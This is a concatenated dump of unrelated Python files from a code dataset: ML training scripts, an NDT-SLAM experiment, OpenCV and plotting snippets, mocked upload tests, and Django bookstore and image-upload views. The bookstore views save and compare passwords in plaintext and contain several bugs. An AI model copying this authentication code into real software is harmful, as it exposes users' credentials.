CIFAR10(data_home, train=True, download=True, transform=train_transform)\n ds_test = CIFAR10(data_home, train=False, download=True, transform=test_transform)\n\n if cfg.get(\"Debug\") and cfg.Debug.get(\"subset\"):\n ratio = cfg.Debug.subset\n ds_train = train_test_split(ds_train, test_ratio=ratio, random=True)[1]\n ds_test = train_test_split(ds_test, test_ratio=ratio, random=True)[1]\n\n train_loader = get_dataloader(cfg.Dataset.Train, ds_train)\n test_loader = get_dataloader(cfg.Dataset.Test, ds_test)\n\n net = get_model(cfg, horch.models.cifar)\n\n criterion = CrossEntropyLoss(label_smoothing=cfg.get(\"label_smooth\"))\n\n optimizer = get_optimizer(cfg.Optimizer, net)\n lr_scheduler = get_lr_scheduler(cfg.LRScheduler, optimizer)\n\n mix = get_mix(cfg.get(\"Mix\"))\n\n metrics = {\n 'loss': TrainLoss(),\n 'acc': Accuracy(mix),\n }\n\n test_metrics = {\n 'loss': Loss(nn.CrossEntropyLoss()),\n 'acc': Accuracy(),\n }\n\n trainer = Trainer(net, criterion, optimizer, lr_scheduler,\n metrics, test_metrics, save_path=cfg.save_path, mix=mix,\n fp16=cfg.get(\"fp16\", False))\n\n if args.resume:\n if args.resume == 'default':\n trainer.resume()\n else:\n trainer.resume(args.resume)\n\n trainer.fit(train_loader, cfg.epochs, val_loader=test_loader,\n eval_freq=cfg.get(\"eval_freq\", 1), save_freq=cfg.get(\"save_freq\"),\n n_saved=cfg.get(\"n_saved\", 1), progress_bar=cfg.get(\"prograss_bar\", False))\n","sub_path":"tools/train_cifar10.py","file_name":"train_cifar10.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"158216077","text":"import tensorflow as tf\n\n\ndef convert_score_to_rank(features, label, scores):\n \"\"\"\n Convert scores for each record to rank within query\n\n Parameters\n ----------\n features: dict of tensors\n Dictionary of tensors that are the features used by the model\n label: Tensor\n Tensor object for the true label\n score: Tensor\n Tensor object containing the scores for each record within a query\n Shape -> [batch_size, sequence_size, 1]\n\n Returns\n -------\n Tensor\n Rank of each record within a query for all queries in the batch\n Shape -> [batch_size, sequence_size, 1]\n \"\"\"\n scores = tf.squeeze(scores, axis=-1)\n sorted_indices = tf.argsort(scores, axis=-1, direction=\"DESCENDING\", stable=True)\n ranks = tf.argsort(sorted_indices, stable=True)\n ranks = tf.add(ranks, tf.constant(1))\n ranks = tf.expand_dims(ranks, axis=-1)\n\n return ranks\n","sub_path":"python/ml4ir/applications/ranking/model/scoring/prediction_helper.py","file_name":"prediction_helper.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"198603240","text":"import cv2\n\nimg = cv2.imread(\"Resources/grid.png\")\nprint(img.shape) # (Height,Width,bgr)\nimgResize = cv2.resize(img,(400,300)) # (src,(Width,Height))\nimgResize2 = cv2.resize(img,(722,577)) # (Width , Height)\ncv2.imshow(\"Normal\",img)\ncv2.imshow(\"Res\",imgResize)\ncv2.imshow(\"Res_2\",imgResize2)\n\nimgCrop = img[10:600,10:500] # [height_min:height_max,width_min:width_max]\n\ncv2.imshow(\"Croped\",imgCrop)\ncv2.waitKey(0)\n","sub_path":"Chapter_3/Crop & Resizing.py","file_name":"Crop & Resizing.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"570574854","text":"\"\"\"\nmain_implementation.py\nFile for the offline implementation of NDT-SLAM on the NAVLab resident powerhouse machine\nAuthor: Ashwin Kanhere\nDate Created: 16th June 2019\nDate Modified: 2nd February, 2020\n\"\"\"\nimport numpy as np\nimport ndt\nimport utils\nfrom matplotlib import pyplot as plt\nimport data_utils\nfrom argparse import ArgumentParser\n\ndef main(args):\n \"\"\"\n For a method of NDT approximation, this function samples random initial displacements \n between given ranges and solves the Consensus and Naive NDT odometry.\n The time taken, rotation and displacement error of the Consensus and Naive NDT odometry \n methdos is compared.\n \"\"\"\n\n print('Setting model parameters')\n\n run_no = 1\n plot_fig = args.plot_figs\n\n run_mode = args.run_mode\n total_iters = args.total_iters\n iter1 = args.iter1\n iter2 = args.iter2\n num_pcs = args.num_pcs\n num_odom_vects = args.num_odom_vects\n test_mode = args.test_mode\n\n max_x = 0.4\n max_y = 0.4\n max_z = 0.1\n max_phi = 10\n max_theta = 10\n max_psi = 30\n\n odom_limits = np.array([max_x, max_y, max_z, max_phi, max_theta, max_psi])\n\n # Choose the voxel lengths at which NDT approximation will be calculated. If a single value is used, only 1 NDT approximation will be performed\n scale_array = np.array([2., 1.]) # np.array([2., 1., 0.5]) # np.array([1.])\n\n assert(total_iters == iter1 + iter2)\n\n print('Loading dataset')\n pcs = data_utils.load_uiuc_pcs(0, num_pcs-1, mode=run_mode)\n\n # Choose the different values of the voxel consensus metric which'll be used to remove low consensus voxels\n integrity_filters = np.array([0.3, 0.4, 0.5, 0.6, 0.7, 0.8]) # np.array([0.5, 0.8])\n\n num_int_vals = np.size(integrity_filters)\n\n print('Creating placeholder variables for storing errors')\n\n odom_vectors = np.zeros([num_int_vals, num_pcs, num_odom_vects, 6])\n\n vanilla_time = np.zeros([num_int_vals, num_pcs, num_odom_vects])\n vanilla_pos_error = np.zeros_like(vanilla_time)\n vanilla_rot_error = np.zeros_like(vanilla_time)\n\n consensus_time = np.zeros_like(vanilla_time)\n consensus_pos_error = np.zeros_like(vanilla_pos_error)\n consensus_rot_error = np.zeros_like(vanilla_rot_error)\n\n for pc_idx, ref_pc in enumerate(pcs):\n for odom_idx in range(num_odom_vects):\n \n rand_num = 2*(np.random.rand(6) - 0.5) # Choose a random odometry vector to test convergence of algorithm\n test_odom = odom_limits*rand_num\n inv_test_odom = utils.invert_odom_transfer(test_odom)\n\n print('Creating transformed test point cloud')\n trans_pc = utils.transform_pc(test_odom, ref_pc)\n\n print('\\nRunning vanilla multi-scale NDT for PC:', pc_idx, 'odometry: ', odom_idx, '\\n')\n\n vanilla_odom, test_van_time, _ = ndt.multi_scale_ndt_odom(np.copy(ref_pc), np.copy(trans_pc), scale_array, 0.5,\n test_mode, total_iters, 0)\n\n for cv_idx, cv in enumerate(integrity_filters):\n print('\\nExperiment for C_v:', cv, ' pc number:', pc_idx, 'odometry:', odom_idx, '\\n')\n print('Running consensus multi-scale NDT')\n consensus_odom, test_con_time, _ = ndt.multi_scale_ndt_odom(np.copy(ref_pc), np.copy(trans_pc),\n scale_array, cv, test_mode, iter1, iter2)\n\n print('Computing and storing error and timing values')\n\n consensus_odom_diff = consensus_odom - inv_test_odom\n consensus_time[cv_idx, pc_idx, odom_idx] = test_con_time\n consensus_pos_error[cv_idx, pc_idx, odom_idx] = np.linalg.norm(consensus_odom_diff[:3])\n consensus_rot_error[cv_idx, pc_idx, odom_idx] = np.linalg.norm(consensus_odom_diff[3:])\n\n vanilla_odom_diff = vanilla_odom - inv_test_odom\n\n odom_vectors[:, pc_idx, odom_idx, :] = inv_test_odom\n\n vanilla_time[:, pc_idx, odom_idx] = test_van_time\n vanilla_pos_error[:, pc_idx, odom_idx] = np.linalg.norm(vanilla_odom_diff[:3])\n vanilla_rot_error[:, pc_idx, odom_idx] = np.linalg.norm(vanilla_odom_diff[3:])\n\n if pc_idx % 10 == 0:\n print('Saving computed values')\n np.save('consensus_values_' + test_mode + '_' + str(run_no), integrity_filters)\n np.save('odometry_vectors' + test_mode + '_' + str(run_no), odom_vectors)\n np.save(\"vanilla_time_\" + test_mode + '_' + str(run_no), vanilla_time)\n np.save(\"vanilla_pos_error_\" + test_mode + '_' + str(run_no), vanilla_pos_error)\n np.save(\"vanilla_rot_error_\" + test_mode + '_' + str(run_no), vanilla_rot_error)\n\n np.save(\"consensus_time_\" + test_mode + '_' + str(run_no), consensus_time)\n np.save(\"consensus_pos_error_\" + test_mode + '_' + str(run_no), consensus_pos_error)\n np.save(\"consensus_rot_error_\" + test_mode + '_' + str(run_no), consensus_rot_error)\n\n\n\n if plot_fig:\n plt.close('all')\n plot_vanilla_time = utils.plot_averaged(vanilla_time)\n plot_vanilla_pos_error = utils.plot_averaged(vanilla_pos_error)\n plot_vanilla_rot_error = utils.plot_averaged(vanilla_rot_error)\n\n plot_consensus_time = utils.plot_averaged(consensus_time)\n plot_consensus_pos_error = utils.plot_averaged(consensus_pos_error)\n plot_consensus_rot_error = utils.plot_averaged(consensus_rot_error)\n\n plt.figure()\n plt.plot(integrity_filters, plot_vanilla_time, label='Vanilla Timing')\n plt.plot(integrity_filters, plot_consensus_time, label='Consensus Timing')\n plt.title(\"Timing comparison\")\n plt.legend(loc=\"upper right\")\n\n plt.figure()\n plt.plot(integrity_filters, plot_vanilla_pos_error, label='Vanilla Position Error')\n plt.plot(integrity_filters, plot_consensus_pos_error, label='Consensus Position Error')\n plt.title(\"Position Error comparison\")\n plt.legend(loc=\"upper right\")\n\n plt.figure()\n plt.plot(integrity_filters, plot_vanilla_rot_error, label='Vanilla Rotation Error')\n plt.plot(integrity_filters, plot_consensus_rot_error, label='Consensus Rotation Error')\n plt.title('Rotation Error comparison')\n plt.legend(loc=\"upper right\")\n\n plt.show()\n\n print('Saving computed values')\n np.save('consensus_values_' + test_mode + '_' + str(run_no), integrity_filters)\n np.save('odometry_vectors' + test_mode + '_' + str(run_no), odom_vectors)\n np.save(\"vanilla_time_\" + test_mode + '_' + str(run_no), vanilla_time)\n np.save(\"vanilla_pos_error_\" + test_mode + '_' + str(run_no), vanilla_pos_error)\n np.save(\"vanilla_rot_error_\" + test_mode + '_' + str(run_no), vanilla_rot_error)\n\n np.save(\"consensus_time_\" + test_mode + '_' + str(run_no), consensus_time)\n np.save(\"consensus_pos_error_\" + test_mode + '_' + str(run_no), consensus_pos_error)\n np.save(\"consensus_rot_error_\" + test_mode + '_' + str(run_no), consensus_rot_error)\n\n return 0\n\nif __name__ == \"__main__\":\n parser = ArgumentParser()\n parser.add_argument('--plot_figs', dest='plot_figs', action='store_true', default=True)\n parser.add_argument('--run_mode', type=str, choices=['server', 'laptop'], default='laptop')\n parser.add_argument('--test_mode', type=str, choices=['overlap','nooverlap','interpolate'], default='overlap')\n parser.add_argument('--total_iters', type=int, default=20)\n parser.add_argument('--iter1', type=int, default=10)\n parser.add_argument('--iter2', type=int, default=10)\n parser.add_argument('--num_pcs', type=int, choices=[2,30,100], default=2)\n parser.add_argument('--num_odom_vects', type=int, choices=[5,10], default=5)\n \n args = parser.parse_args()\n main(args)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"364729112","text":"import pandas as pd # 导入pandas库用来处理csv文件\r\nimport matplotlib.pyplot as plt # 导入matplotlib.pyplot并用plt简称\r\nunrate = pd.read_csv('0634.csv') # 读csv文件\r\ndata = unrate[0:] # 取前12行数据\r\n\r\nplt.plot(data['epoch'], data['label0'], color='deeppink', label='label 0')\r\nplt.plot(data['epoch'], data['label1'], color='orange', label='label 1')\r\nplt.plot(data['epoch'], data['label2'], color='limegreen', label='label 2')\r\nplt.plot(data['epoch'], data['label3'], color='dodgerblue', label='label 3')\r\nplt.legend()\r\n\r\nplt.xlabel('epoch') # 给x轴数据加上名称\r\nplt.ylabel('avg_dice_loss') # 给y轴数据加上名称\r\nplt.title('Dice Loss Line Graph in Training Period') # 给整个图表加上标题\r\n\r\nplt.show() # 将刚画的图显示出来\r\n","sub_path":"line_chart.py","file_name":"line_chart.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"271949635","text":"import os\nfrom pathlib import Path\n\nimport responses\n\nfrom wikidict import upload\nfrom wikidict.constants import RELEASE_URL\n\n\ndef test_fetch_release_url():\n url = upload.fetch_release_url(\"fr\")\n assert isinstance(url, str)\n assert url.startswith(\"https://api.github.com/repos/\")\n assert \"/releases/\" in url\n\n\n@responses.activate\ndef test_main(capsys):\n\n # List of requests responses to falsify:\n # - fetch_release_url() -> GET $RELEASE_URL\n # - update_release() -> POST https://api.github.com/repos/.../releses/$UID\n release_url = RELEASE_URL.format(\"fr\")\n responses.add(responses.GET, release_url, json={\"url\": release_url})\n responses.add(responses.PATCH, release_url, json={\"url\": release_url})\n\n # Start the whole process\n os.environ[\"GITHUB_TOKEN\"] = \"token\"\n output_dir = Path(os.environ[\"CWD\"]) / \"data\" / \"fr\"\n (output_dir / \"words.count\").write_text(\"123456789\")\n (output_dir / \"words.snapshot\").write_text(\"20200220\")\n try:\n assert upload.main(\"fr\") == 0\n finally:\n (output_dir / \"words.count\").unlink()\n (output_dir / \"words.snapshot\").unlink()\n captured = capsys.readouterr()\n assert captured.out.splitlines()[-1] == \">>> Release updated!\"\n\n\n@responses.activate\ndef test_main_bad_url(capsys):\n # Test a bad release URL, fetch_release_url() will return an empty URL\n release_url = RELEASE_URL.format(\"fr\")\n responses.add(responses.GET, release_url, json={\"url\": \"\"})\n\n assert upload.main(\"fr\") == 1\n captured = capsys.readouterr()\n assert captured.out.splitlines()[-1] == \" !! Cannot retrieve the release URL.\"\n","sub_path":"tests/test_4_upload.py","file_name":"test_4_upload.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"451735469","text":"import cv2\r\nfrom imageai.Detection import ObjectDetection\r\nimport os\r\nfrom clarifai import rest\r\nfrom clarifai.rest import ClarifaiApp\r\n\r\n\r\n#Returns a working directory for the actual folder of the file.\r\nexecution_path = os.getcwd()\r\n\r\nprint(execution_path)\r\n\r\n#Initialize the detector.\r\ndetector = ObjectDetection()\r\n\r\n#This sets the initial object detection model instance to the pre trained \"RetinaNet\" model. \r\ndetector.setModelTypeAsRetinaNet()\r\n\r\n#Set the model path of the model file we downloaded (the resnet model that uses the COCO database)\r\ndetector.setModelPath(os.path.join(execution_path , \"resnet50_coco_best_v2.0.1.h5\"))\r\n\r\n#Load the model.\r\ndetector.loadModel()\r\ncap = cv2.VideoCapture(1) \r\n#Note: 0 is internal cam and 1 is external webcam.\r\n\r\nz=0\r\nwhile(1):\r\n #Photo analysis.\r\n z += 1\r\n ret, frame = cap.read()\r\n cv2.imshow(\"imshow\",frame)\r\n cv2.waitKey(1)\r\n print(z)\r\n if z == 30:\r\n z = 0\r\n y = 0\r\n cv2.imwrite('C:/Users/adity/desktop/image'+str(y)+'.png', frame)\r\n print(\"Wrote Image\")\r\n\r\n detections = detector.detectObjectsFromImage(input_image=os.path.join(execution_path, 'C:/Users/adity/desktop/image'+str(y)+'.png'),\r\n output_image_path=os.path.join(execution_path, \"output.jpg\"))\r\n for x in detections:\r\n if(x[\"name\"] == \"person\" and int(x[\"percentage_probability\"]) > 80):\r\n print(\"person\" + \" \" + str(int(x[\"percentage_probability\"])))\r\n","sub_path":"person detection.py","file_name":"person detection.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"3006851","text":"from django.http import HttpResponse\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.contrib import messages\nfrom . forms import *\nfrom django.views import generic\n\ndef index(request):\n try:\n if request.session['user_id']:\n return redirect('profile')\n finally: \n return render(request = request, template_name = 'home.html')\n\ndef signup(request):\n if request.method == 'POST':\n form = SignupForm(request.POST)\n if form.is_valid():\n newUser = Customer()\n newUser.user_id = form.cleaned_data.get('user_id')\n newUser.email = form.cleaned_data.get('email')\n newUser.password = form.cleaned_data.get('password')\n newUser.first_name = form.cleaned_data.get('first_name')\n newUser.middle_name = form.cleaned_data.get('middle_name')\n newUser.last_name = form.cleaned_data.get('last_name')\n newUser.phone_no = form.cleaned_data.get('phone_no')\n newUser.save()\n\n #username = form.cleaned_data.get('user_id')\n #raw_password = form.cleaned_data.get('password')\n #user = authenticate(username=username, password=raw_password)\n #login(request, user)\n #messages.info(request, \"Welcome to KGP\")\n return redirect('index')\n else:\n messages.error(request, \"Invalid Form Details\")\n form = SignupForm()\n return render(request, 'users/sign_up.html', {'form': form})\n else:\n form = SignupForm()\n return render(request, 'users/sign_up.html', {'form': form})\n\ndef login(request):\n if request.method == \"POST\":\n print(request)\n form = LoginForm(request.POST)\n if form.is_valid():\n #print(form);\n #return redirect('index');\n username = form.cleaned_data.get('user_id')\n raw_password = form.cleaned_data.get('password')\n user = Customer.objects.filter(user_id = username, password = raw_password)\n if user:\n messages.info(request, f\"You are now logged in as {username}\")\n user_id = request.POST['user_id']\n request.session['user_id'] = user_id\n return redirect('profile')\n else:\n messeags.error(request, \"Invalid Username or Password\")\n else:\n messages.error(request, \"Invalid USERNAME or PASSWORD\")\n form = LoginForm()\n return render(request, \"users/login.html\", context= {\"form\":form})\n\ndef userProfile(request):\n if request.session.has_key('user_id'):\n posts = request.session['user_id']\n query = Customer.objects.filter(user_id = posts)\n return render(request, 'users/profile.html', {\"query\":query})\n else:\n redirect(request,'home.html', {} )\n\ndef userLogout(request):\n try:\n del request.session['user_id']\n except :\n pass\n return redirect( 'index')\n#All starting with user contains user_id in the request to help us identify different users\n\n\n#Returns books added by the particular user\ndef userCart(request, book_id = None):\n if request.session['user_id']:\n user_id = request.session['user_id']\n if 'store_id' in request.GET:\n print(request.GET['store_id'])\n thisBookStore = Book_store.objects.get(store_id = request.GET['store_id'])\n newCart = Cart()\n newCart.user_id = Customer.objects.get(user_id = user_id)\n newCart.book_id = Book.objects.get(book_id = book_id)\n newCart.store_id = thisBookStore\n newCart.price = Book_available.objects.get(store_email = thisBookStore.email, book_id = book_id).price\n #newCart.price = request.GET['store'].price\n newCart.no_of_copies = request.GET['no_of_copies']\n newCart.save()\n books_in_cart = Cart.objects.filter(user_id = user_id)\n total_price = 0\n num_order = 0\n seller_list = []\n for book in books_in_cart:\n total_price += book.price*book.no_of_copies\n return render(request, 'users/userCart.html', {'books_in_cart' : books_in_cart, 'total_price' : total_price})\n else:\n messages.warning(request, 'You are not logged in. Please log in to continue')\n redirect('index') \n return HttpResponse(\"Cart Page for user\")\n\ndef userConfirmAddress(request):\n if request.session['user_id']:\n user_id = request.session['user_id']\n addresses= Customer_address.objects.filter(user_id = user_id)\n primary_address = ''\n other_address = []\n for address in addresses:\n if(address.is_current):\n primary_address = address\n else:\n other_address.append(address)\n obj = {\n 'primary_address': primary_address,\n 'other_address': other_address\n }\n return render(request, 'users/confirmAddress.html', obj)\n else:\n messages.warning(request, \"You are not logged in. Please log in\")\n return redirect('index')\n \ndef userAddAsPrimaryAddress(request, address_id):\n if request.session['user_id']:\n user_id = request.session['user_id']\n print(address_id)\n all_address = Customer_address.objects.filter(user_id = user_id)\n for address in all_address:\n address.is_current = False\n address.save()\n p_address = Customer_address.objects.get(address_id = address_id)\n p_address.is_current = True\n p_address.save()\n messages.success(request, 'Address Set As Primary')\n return redirect('confirmAddress')\n else:\n messages.error(request, \"Please Log In First\")\n return redirect('index')\n\n\ndef userPlaceOrder(request, address_no):\n if request.session['user_id']:\n user_id = request.session['user_id']\n all_orders = Cart.objects.filter(user_id = user_id)\n store_list = []\n price_list = []\n book_store_ind = []\n count = 0\n for books in all_orders:\n if books.store_id in store_list:\n price_list[store_list.index(books.store_id)] += books.price*(books.no_of_copies)\n \n else:\n store_list.append(books.store_id)\n price_list.append(books.price)\n \n book_store_ind.append(store_list.index(books.store_id))\n count += 1\n \n order_id= [] \n for i in range(0,len(store_list)):\n newOrder = Order()\n print(\"The order Id is \", newOrder.order_id)\n newOrder.user_id = Customer.objects.get(user_id = user_id)\n newOrder.store_id = store_list[i]\n newOrder.total_price = price_list[i]\n newOrder.address_no = address_no\n newOrder.status = 'Processing'\n newOrder.save()\n print(\"This ID: \", newOrder.order_id)\n order_id.append(newOrder.order_id)\n\n count =0\n for book in all_orders:\n newBook = Book_ordered()\n print(\"New Book Book_ordered_id:\", newBook.Book_ordered_id)\n newBook.book_id = book.book_id\n newBook.store_id = book.store_id\n newBook.order_id = Order.objects.get(order_id = order_id[book_store_ind[count]])\n newBook.no_of_copies = book.no_of_copies\n newBook.save()\n print(\"New Book Book_ordered_id:\", newBook.Book_ordered_id)\n count +=1\n \n Cart.objects.filter(user_id = user_id ).delete()\n messages.success(request, 'Order Placed Successfully')\n return redirect('profile')\n else:\n messages.error(request, 'Please Log In First')\n return redirect('index')\n\n#Returns all the order made by the user\ndef userOrders(request):\n return HttpResponse(\"Orders by the user\")\n\ndef userOrderComplain(request):\n return HttpResponse(\"Return Complain correspoding to this user and a given order\")\n\ndef userBookReveiw(request):\n return HttpResponse(\"Helps in reviewing a book by user\")\n\n\n#To display the To Read List of the user\ndef userBookList(request):\n if request.session['user_id'] :\n user_id = request.session['user_id']\n if request.method == 'POST':\n return redirect('index')\n BookObjectList = To_read_list.objects.filter(user_id= user_id)\n book_list= []\n for book in BookObjectList:\n book_object = Book.objects.filter(book_id = book.book_id.book_id)\n for book_fin in book_object:\n book_list.append({'title':book_fin.title, 'author': book_fin.author, 'book_id':book_fin.book_id})\n return render(request, 'users/book_list.html', {'book_list':book_list})\n else:\n messages.warning(request,'You are logged in. Please Log in')\n return redirect('index')\n\n#To remove Book from user's read list\ndef userRemoveBook(request, book_id):\n if request.session['user_id'] :\n user_id = request.session['user_id']\n if request.method == 'POST':\n return redirect('profile')\n To_read_list.objects.filter(book_id = book_id, user_id = user_id).delete()\n else:\n messages.warning(request,'You are logged in. Please Log in')\n return redirect('index')\n\ndef userAddAddress(request):\n if request.session['user_id']:\n user_id = request.session['user_id']\n if request.method == \"POST\":\n form = userAddressForm(request.POST)\n count_add = Customer_address.objects.filter(user_id = user_id)\n add_num = 0\n for add in count_add:\n add_num += 1\n if form.is_valid():\n print(form)\n address = Customer_address()\n address.user_id = Customer.objects.get(user_id =user_id)\n address.address_line1 = form.cleaned_data.get('address_line1')\n address.address_line2 = form.cleaned_data.get('address_line2')\n address.city = form.cleaned_data.get('city')\n address.district = form.cleaned_data.get('district')\n address.state = form.cleaned_data.get('state')\n address.zip_code = form.cleaned_data.get('zip_code')\n address.address_no = add_num +1\n address.save()\n messages.success(request, \"Address saved successfully\")\n return redirect('profile')\n else:\n form = userAddressForm()\n print(form)\n return render(request, 'users/addAddress.html', {'form': form})\n else:\n messages.error(request,\"Please Login First!\")\n return redirect('index')\n\n\ndef viewBook(request, book_id):\n print(book_id)\n sellers= Book_available.objects.filter(book_id = book_id)\n\n book = Book.objects.get(book_id = book_id)\n return render(request, 'users/viewBook.html', {'book': book, 'sellers': sellers})\n\n\ndef searchBooks(request):\n search_term = ''\n\n if 'search' in request.GET:\n search_term = request.GET['search']\n filter = request.GET['filter']\n if(filter == 'title'):\n books = Book.objects.filter( title__contains=search_term )\n if(filter == 'genre'):\n books = Book.objects.filter( genre__contains=search_term )\n if(filter == 'publisher'):\n books = Book.objects.filter( publisher__contains=search_term ) \n if(filter == 'author'):\n books = Book.objects.filter( author__contains=search_term )\n # books = Book.objects.all()\n print(books)\n return render(request, 'users/searchResult.html', {'books' : books, 'search_term': search_term, 'filter': filter })\n#Store Owner\n\ndef storeSignUp(request):\n if request.method == \"POST\":\n form = StoreSignUp(request.POST)\n if form.is_valid():\n email = form.cleaned_data.get('email')\n userCount = Book_store.objects.filter(email = email).count()\n if userCount == 0:\n form.save()\n username = form.cleaned_data.get('store_name')\n messages.info(request, f\"You have now signed up as {username}\")\n return redirect('index')\n else:\n messages.error(request, 'Email Address already exists')\n else:\n messages.error(request, \"Invalid Fomr\")\n else:\n form = StoreSignUp()\n return render(request, 'store/storeSignUp.html', {\"form\":form})\n\n\ndef storeLogin(request):\n if request.method == \"POST\":\n print(\"request received\", request)\n form = storeLoginForm(request.POST)\n if form.is_valid():\n print(\"form received \", form);\n #return redirect('index');\n email = form.cleaned_data.get('email')\n raw_password = form.cleaned_data.get('password')\n userCount = Book_store.objects.filter(email = email, password = raw_password).count()\n #user = Book_store.objects.filter(email = email, password = raw_password)\n if userCount == 1:\n #print(user)\n messages.info(request, f\"You are now logged in with Email Id: {email}\")\n #curr_store = Book_store.objects.filter(email = email, password = raw_password).first()\n request.session['email'] = request.POST['email']\n return redirect('storeProfile')\n else:\n print(\"Invalid Form\")\n messages.error(request, \"Invalid Email or Password\")\n else:\n print(\"Invalid Form Input\")\n messages.error(request, \"Invalid Email or PASSWORD\")\n form = storeLoginForm()\n return render(request, \"store/storeLogin.html\", context= {\"form\":form})\n\ndef storeProfile(request):\n if request.session.has_key('email'):\n posts = request.session['email']\n query = Book_store.objects.filter(email = posts)\n return render(request, 'store/storeProfile.html', {\"query\":query})\n else:\n redirect(request,'store/storeProfile.html', {} )\n\ndef storeLogout(request):\n try:\n del request.session['email']\n except :\n pass\n return redirect( 'index')\n\ndef storeBookAdd(request):\n if request.method == \"POST\":\n form = bookAddForm(request.POST)\n if form.is_valid():\n newUser = Book()\n newUser.title = form.cleaned_data.get('title')\n newUser.author = form.cleaned_data.get('author')\n newUser.publisher = form.cleaned_data.get('publisher')\n newUser.genre = form.cleaned_data.get('genre')\n newUser.year_of_publish = form.cleaned_data.get('year_of_publish')\n num_copies = form.cleaned_data.get('no_of_books')\n this_book_count = Book.objects.filter(title = newUser.title, author = newUser.author).count()\n if this_book_count == 0:\n newUser.copies_sold = 0\n newUser.save()\n bookAndStore = Book_available()\n bookAndStore.store_email = Book_store.objects.filter(email = request.session['email']).first()\n bookAndStore.book_id = newUser\n bookAndStore.no_of_copies = num_copies\n bookAndStore.price = form.cleaned_data.get('price')\n bookAndStore.save()\n else:\n book_id = Book.objects.filter(title = newUser.title, author= newUser.author)[0].book_id\n store_email = Book_store.objects.filter(email = request.session['email']).first()\n myBook = Book_available.objects.filter(book_id = book_id, store_email = store_email).count()\n if myBook is 0:\n myBook = Book_available()\n myBook.book_id = Book.objects.get(title = newUser.title, author = newUser.author)\n myBook.store_email = store_email\n else:\n myBook = Book_available.objects.get(book_id = book_id, store_email = store_email)\n myBook.no_of_copies = myBook.no_of_copies + num_copies\n myBook.save()\n else:\n messages.error(request, \"Invalid Book Data Entered\")\n else:\n addBookForm = bookAddForm()\n return render(request, 'store/addBook.html',{\"form\":addBookForm})\n \n if request.session.has_key('email'):\n posts = request.session['email']\n query = Book_store.objects.filter(email = posts)\n return render(request, 'store/storeProfile.html', {\"query\":query})\n else:\n messages.error(request, \"Please Log In First\")\n return redirect('index') \n\ndef storeBookDel(request):\n return HttpResponse(\"Helps in removing books for store book list\")\n\ndef storeBookView(request):\n return HttpResponse(\"Return all the books correspoding to the store\")\n\ndef storeUpdateBook(request):\n return HttpResponse(\"Page for updating information corresponding to a book\")\n\ndef storeOrderList(request):\n return HttpResponse(\"Return Order List for the book\")\n\n#Extract data from order schema and returns books according to status \ndef storeSalesList(request):\n return HttpResponse(\"Return Sales List\")\n\n#Uses user_id and store_id \n\ndef storeUserList(request):\n return HttpResponse(\"Returns the user who bought books from this store\")\n\n\n#Independent of Store and User\ndef trendingList(request):\n return HttpResponse(\"Returns the best selling books top 10 \")\n\n","sub_path":"newApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":17441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"612006052","text":"from django import forms\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render, redirect\n\n# Create your views here.\nfrom django.views.decorators.http import require_http_methods\n\nfrom pic.models import Scene, Submission\n\n\ndef index(request):\n return render(request, 'pic/index.html',\n {'all_pics': Scene.objects.all(),\n 'all_subs': Submission.objects.all()})\n\n\nclass ImageUploadForm(forms.Form):\n images = forms.FileField(widget=forms.ClearableFileInput(attrs={'multiple': True}))\n\nclass GifUploadForm(forms.Form):\n gifs = forms.FileField(widget=forms.ClearableFileInput(attrs={'multiple': True}))\n\n@require_http_methods([\"POST\"])\ndef upload_pic(request):\n form = ImageUploadForm(request.POST, request.FILES)\n if form.is_valid():\n for file in form.files.getlist('images'):\n m = Scene.objects.create()\n m.pic = file\n m.save()\n return redirect(reverse('index'))\n\n@require_http_methods([\"POST\"])\ndef upload_gif(request):\n form = GifUploadForm(request.POST, request.FILES)\n # if form.is_valid(): # form isnt valid?\n for file in form.files.getlist('gifs'):\n m = Submission.objects.create()\n m.scene = Scene.objects.first()\n m.gif = file\n m.save()\n return redirect(reverse('index'))\n\n\ndef scene_list(request):\n scenes = []\n for p in Scene.objects.all():\n scenes.append([{'id': p.id,\n 'url': 'https://localhost:8000/media/' + p.pic.url}])\n return JsonResponse({'scenes': scenes})\n\n\ndef submission_list(request, scene_id):\n submissions = []\n for s in Submission.objects.filter(scene=scene_id):\n submissions.append([{'id': s.id,\n 'gif_url': 'https://localhost:8000/media/' + s.gif.url}])\n return JsonResponse({'submissions': submissions})","sub_path":"spike/pic/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"424121870","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 24 00:05:56 2018\n\n@author: chenhx1992\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nfrom numpy import genfromtxt\n\n\nfilelist = np.array(genfromtxt('./Subjective_AMT/batch_N_A.txt'), dtype=int)\ndf = pd.DataFrame(index = filelist)\n\ndata = pd.read_csv('./Subjective_AMT/Batch_3410045_N_A_results.csv')\n\n# ApprovedData = data[data['AssignmentStatus']=='Approved']\nApprovedData = data\n\nApprovedWorker = ApprovedData['WorkerId']\n\nUniqueWorker = ApprovedWorker.unique()\n\nnumofWorker = 